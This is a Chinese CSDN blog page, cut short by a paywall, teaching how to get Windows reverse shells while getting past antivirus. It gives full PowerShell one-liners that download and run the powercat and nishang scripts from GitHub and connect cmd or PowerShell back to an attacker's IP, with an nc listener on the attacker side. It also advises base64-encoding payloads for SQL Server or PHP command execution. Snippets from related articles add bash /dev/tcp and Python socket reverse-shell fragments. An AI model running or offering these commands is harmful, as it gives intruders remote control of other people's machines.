python反弹shell_windows命令行反弹shell(一)

最新推荐文章于 2024-02-08 22:44:52 发布
VIP文章 最新推荐文章于 2024-02-08 22:44:52 发布
阅读量1.1k 收藏
点赞数
文章标签: python反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33463850/article/details/113508831
版权

前言

实战中会遇到各种AV,有时候无法直接反弹到msf或CS中。我们可以婉转一些,先反弹到cmd里再想办法bypass。

powershell反弹cmd

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。

被攻击端运行命令

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

攻击端用nc监听。

即可反弹出cmd。

powershell反弹powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666

攻击端用nc监听。

即可反弹出powershell。

注意某些特殊情况需要将powershell脚本进行base64编码,才能成功反弹。比如sqlserver的命令执行、php中system函数的执行

base64编码处理

$text="IEX((New-Object System.Net.WebClient).DownloadString(

最低0.47元/天 解锁文章
杀鼠狂魔猪尾草
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1237
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
反弹Shell方法论,Windows
大河之犬的博客
10-10 368
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
Python实现反向Shell
最新发布
xingxsc的博客
02-08 409
反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
各种shell反弹方法
weixin_46626737的博客
05-16 1489
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
Windows 反弹shell方法
weixin_53747497的博客
07-12 2030
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
渗透测试-window反弹shell
lza20001103的博客
05-11 3893
window反弹shell
如何在Windows命令行中打开Python自带shell
u011699626的博客
09-20 7641
不知道大家有没有过困扰,就是该如何在windows自带的命令行中打开python自带的shell(编译器),今天研究了以下特来分享。 实际过程十分简单。 第一步: 使用Win + R打开运行界面,如下图所示: 第二步:输入cmd,并点击确定,因为我的系统语言不是中文,所以上面的图片显示的不太一样,不过不影响。结果如下图所示: 第三步:输入result并按下Enter(回车键)。结果如下图所示: 然而这种方法打开的自带shell存在问题,就是只能够使用python本身自带的模块,用户自己添加的模块并不能
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 1942
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
rrs.tar.gz_python 实现shell_remote
09-14
rrs(reverse remote shell)的python实现
用于alerta的统一命令行工具和pythonSDK_Python_Shell_.zip
04-05
用于alerta的统一命令行工具和pythonSDK_Python_Shell_.zip
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常...[ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
GRanadaElectromagneticPYthon模拟器_Python_Shell_下载.zip
04-08
GRanadaElectromagneticPYthon模拟器_Python_Shell_下载
python程序运行结果不停_关于python:在进程运行时不断打印Subprocess输出
weixin_39960920的博客
12-08 1984
要从我的python脚本启动程序,我使用以下方法:def execute(command):process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)output = process.communicate()[0]exitCode = process.retur...
反弹shell总结
weixin_51692662的博客
11-10 1049
反弹shell
python反弹shell
weixin_42576467的博客
01-07 642
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
python 中 subprocess.Popen 总结
weixin_45860565的博客
07-27 1万+
python 中 subprocess.Popen 总结 subprocess的目的就是启动一个新的进程并且与之通信。 subprocess模块中只定义了一个类: Popen。可以使用Popen来创建进程,并与进程进行复杂的交互。它的构造函数如下: subprocess.Popen(args, bufsize=0, executable=None, stdin=None,
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4735
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
python parser.add_argument命令行调用
05-22
`argparse` 是 Python 标准库中一个用于解析命令行参数的模块,使用该模块可以方便地在命令行中传入参数并对其进行解析。以下是使用 `argparse` 模块进行命令行调用的基本步骤: 1. 导入 `argparse` 模块: ``` import argparse ``` 2. 创建 `argparse` 对象: ``` parser = argparse.ArgumentParser() ``` 3. 添加需要解析的参数: ``` parser.add_argument('arg1', help='description of arg1') parser.add_argument('--arg2', help='description of arg2') ``` 其中,`arg1` 是必须传入的参数,`--arg2` 是可选参数。 4. 解析命令行参数: ``` args = parser.parse_args() ``` 5. 使用解析后的参数: ``` print(args.arg1) print(args.arg2) ``` 完整示例代码: ``` import argparse parser = argparse.ArgumentParser() parser.add_argument('arg1', help='description of arg1') parser.add_argument('--arg2', help='description of arg2') args = parser.parse_args() print(args.arg1) print(args.arg2) ``` 使用命令行调用该脚本: ``` python script.py value1 --arg2 value2 ``` 输出结果: ``` value1 value2 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值